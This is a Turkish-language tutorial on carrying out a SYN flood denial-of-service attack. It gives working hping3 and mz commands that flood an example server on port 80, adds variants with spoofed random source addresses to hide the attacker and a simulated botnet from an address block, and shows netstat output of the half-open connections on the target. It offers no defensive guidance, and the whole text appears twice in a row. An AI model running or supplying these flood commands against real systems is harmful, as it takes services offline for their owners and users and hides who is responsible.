SYN Flood Saldırısı Gerçekleştirme
SYN Flood saldırısı, bir sunucunun TCP bağlantı kurma yeteneğini kötüye kullanarak hizmet dışı bırakmayı amaçlayan bir saldırı türüdür. Bu saldırıda, saldırgan sunucuya çok sayıda SYN paketi gönderir, ancak sunucunun gönderdiği SYN-ACK paketlerine karşılık vermez. Böylece, sunucu yarı açık bağlantılarla dolu olur ve yeni bağlantı taleplerini işleyemez.
SYN Flood saldırısı gerçekleştirmek için kullanabileceğiniz bazı araçlar şunlardır:
- Hping3: Bir ağ test aracıdır. TCP, UDP, ICMP ve RAW-IP protokollerini destekler. SYN paketleri göndermek için -S seçeneğini kullanabilirsiniz.
- Mz: Bir paket oluşturma ve enjeksiyon aracıdır. TCP, UDP, ICMP, ARP, IP ve Ethernet protokollerini destekler. SYN paketleri göndermek için flags=syn seçeneğini kullanabilirsiniz.
- Juno: Bir SYN Flood saldırısı simülasyon aracıdır. SYN paketleri göndermek için -s seçeneğini kullanabilirsiniz.
- Netstat: Bir ağ istatistikleri aracıdır. Bağlantı durumlarını görmek için -a seçeneğini kullanabilirsiniz.
Bu araçları kullanarak SYN Flood saldırısı gerçekleştirmek için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hping3 ile gerçek IP adresinden SYN Flood saldırısı gerçekleştirelim. Örneğin, hedef sunucunun IP adresi 192.168.1.1 ve portu 80 olsun. Bu durumda, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# hping3 -S 192.168.1.1 -p 80 --flood
Bu komut, hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. --flood seçeneği, paketleri mümkün olan en hızlı şekilde gönderir. Bu seçeneği kullanmak yerine, -i u0 seçeneğini de kullanabilirsiniz. Bu seçenek, her paket arasında 0 mikrosaniye bekleme süresi belirtir.
2. Adım: Mz ile gerçek IP adresinden SYN Flood saldırısı gerçekleştirelim. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -c 0 -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535"
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -c 0 seçeneği, sonsuz sayıda paket gönderir. -B seçeneği, hedef IP adresini belirtir. -t seçeneği, TCP protokolünü belirtir. flags=syn seçeneği, SYN bayrağını set eder. dp=80 seçeneği, hedef portu belirtir. sp=1-65535 seçeneği, kaynak portunu rastgele seçer.
3. Adım: Hping3 ile rastgele kaynak IP adreslerinden SYN Flood saldırısı gerçekleştirelim. Bu şekilde, saldırının kaynağını gizleyebilirsiniz. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# hping3 -S 192.168.1.1 -p 80 --flood --rand-source
Bu komut, hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. --rand-source seçeneği, kaynak IP adresini rastgele seçer.
4. Adım: Mz ile rastgele kaynak IP adreslerinden SYN Flood saldırısı gerçekleştirelim. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -c 0 -A rand -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535"
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -A rand seçeneği, kaynak IP adresini rastgele seçer.
5. Adım: Mz ile BotNet simülasyonu gerçekleştirelim. Belirli bir IP bloğundan (örneğin, 78.85.12.0/24) SYN Flood saldırısı gerçekleştirelim. Bu şekilde, saldırının birden fazla kaynaktan geldiği izlenimi yaratabilirsiniz. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -A 78.85.12.0/24 -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535" -c 0
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -A 78.85.12.0/24 seçeneği, kaynak IP adresini 78.85.12.0 ile 78.85.12.255 arasında rastgele seçer.
6. Adım: Yapılan saldırının hedef sistemdeki etkisini görmek için hedef sunucu üzerinde netstat -ant komutu çalıştırılarak sonuçlar incelenebilir. Birçok SYN_RECV durumu görmeniz gerekir. Bu durum, sunucunun yarı açık bağlantılarla dolu olduğunu ve yeni bağlantı taleplerini işleyemediğini gösterir.
root@target:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:80 78.85.12.34:12345 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.56:23456 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.78:34567 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.90:45678 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.12:56789 SYN_RECV
...
SYN Flood saldırısı, bir sunucunun TCP bağlantı kurma yeteneğini kötüye kullanarak hizmet dışı bırakmayı amaçlayan bir saldırı türüdür. Bu saldırıda, saldırgan sunucuya çok sayıda SYN paketi gönderir, ancak sunucunun gönderdiği SYN-ACK paketlerine karşılık vermez. Böylece, sunucu yarı açık bağlantılarla dolu olur ve yeni bağlantı taleplerini işleyemez.
SYN Flood saldırısı gerçekleştirmek için kullanabileceğiniz bazı araçlar şunlardır:
- Hping3: Bir ağ test aracıdır. TCP, UDP, ICMP ve RAW-IP protokollerini destekler. SYN paketleri göndermek için -S seçeneğini kullanabilirsiniz.
- Mz: Bir paket oluşturma ve enjeksiyon aracıdır. TCP, UDP, ICMP, ARP, IP ve Ethernet protokollerini destekler. SYN paketleri göndermek için flags=syn seçeneğini kullanabilirsiniz.
- Juno: Bir SYN Flood saldırısı simülasyon aracıdır. SYN paketleri göndermek için -s seçeneğini kullanabilirsiniz.
- Netstat: Bir ağ istatistikleri aracıdır. Bağlantı durumlarını görmek için -a seçeneğini kullanabilirsiniz.
Bu araçları kullanarak SYN Flood saldırısı gerçekleştirmek için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hping3 ile gerçek IP adresinden SYN Flood saldırısı gerçekleştirelim. Örneğin, hedef sunucunun IP adresi 192.168.1.1 ve portu 80 olsun. Bu durumda, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# hping3 -S 192.168.1.1 -p 80 --flood
Bu komut, hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. --flood seçeneği, paketleri mümkün olan en hızlı şekilde gönderir. Bu seçeneği kullanmak yerine, -i u0 seçeneğini de kullanabilirsiniz. Bu seçenek, her paket arasında 0 mikrosaniye bekleme süresi belirtir.
2. Adım: Mz ile gerçek IP adresinden SYN Flood saldırısı gerçekleştirelim. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -c 0 -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535"
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -c 0 seçeneği, sonsuz sayıda paket gönderir. -B seçeneği, hedef IP adresini belirtir. -t seçeneği, TCP protokolünü belirtir. flags=syn seçeneği, SYN bayrağını set eder. dp=80 seçeneği, hedef portu belirtir. sp=1-65535 seçeneği, kaynak portunu rastgele seçer.
3. Adım: Hping3 ile rastgele kaynak IP adreslerinden SYN Flood saldırısı gerçekleştirelim. Bu şekilde, saldırının kaynağını gizleyebilirsiniz. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# hping3 -S 192.168.1.1 -p 80 --flood --rand-source
Bu komut, hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. --rand-source seçeneği, kaynak IP adresini rastgele seçer.
4. Adım: Mz ile rastgele kaynak IP adreslerinden SYN Flood saldırısı gerçekleştirelim. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -c 0 -A rand -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535"
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -A rand seçeneği, kaynak IP adresini rastgele seçer.
5. Adım: Mz ile BotNet simülasyonu gerçekleştirelim. Belirli bir IP bloğundan (örneğin, 78.85.12.0/24) SYN Flood saldırısı gerçekleştirelim. Bu şekilde, saldırının birden fazla kaynaktan geldiği izlenimi yaratabilirsiniz. Önceki örneği kullanarak, aşağıdaki komutu kullanabilirsiniz:
root@bt:~# mz eth0 -A 78.85.12.0/24 -B 192.168.1.1 -t tcp "flags=syn, dp=80, sp=1-65535" -c 0
Bu komut, eth0 arayüzünden hedef sunucuya SYN bayrağı set edilmiş TCP paketleri gönderir. -A 78.85.12.0/24 seçeneği, kaynak IP adresini 78.85.12.0 ile 78.85.12.255 arasında rastgele seçer.
6. Adım: Yapılan saldırının hedef sistemdeki etkisini görmek için hedef sunucu üzerinde netstat -ant komutu çalıştırılarak sonuçlar incelenebilir. Birçok SYN_RECV durumu görmeniz gerekir. Bu durum, sunucunun yarı açık bağlantılarla dolu olduğunu ve yeni bağlantı taleplerini işleyemediğini gösterir.
root@target:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:80 78.85.12.34:12345 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.56:23456 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.78:34567 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.90:45678 SYN_RECV
tcp 0 0 192.168.1.1:80 78.85.12.12:56789 SYN_RECV
...
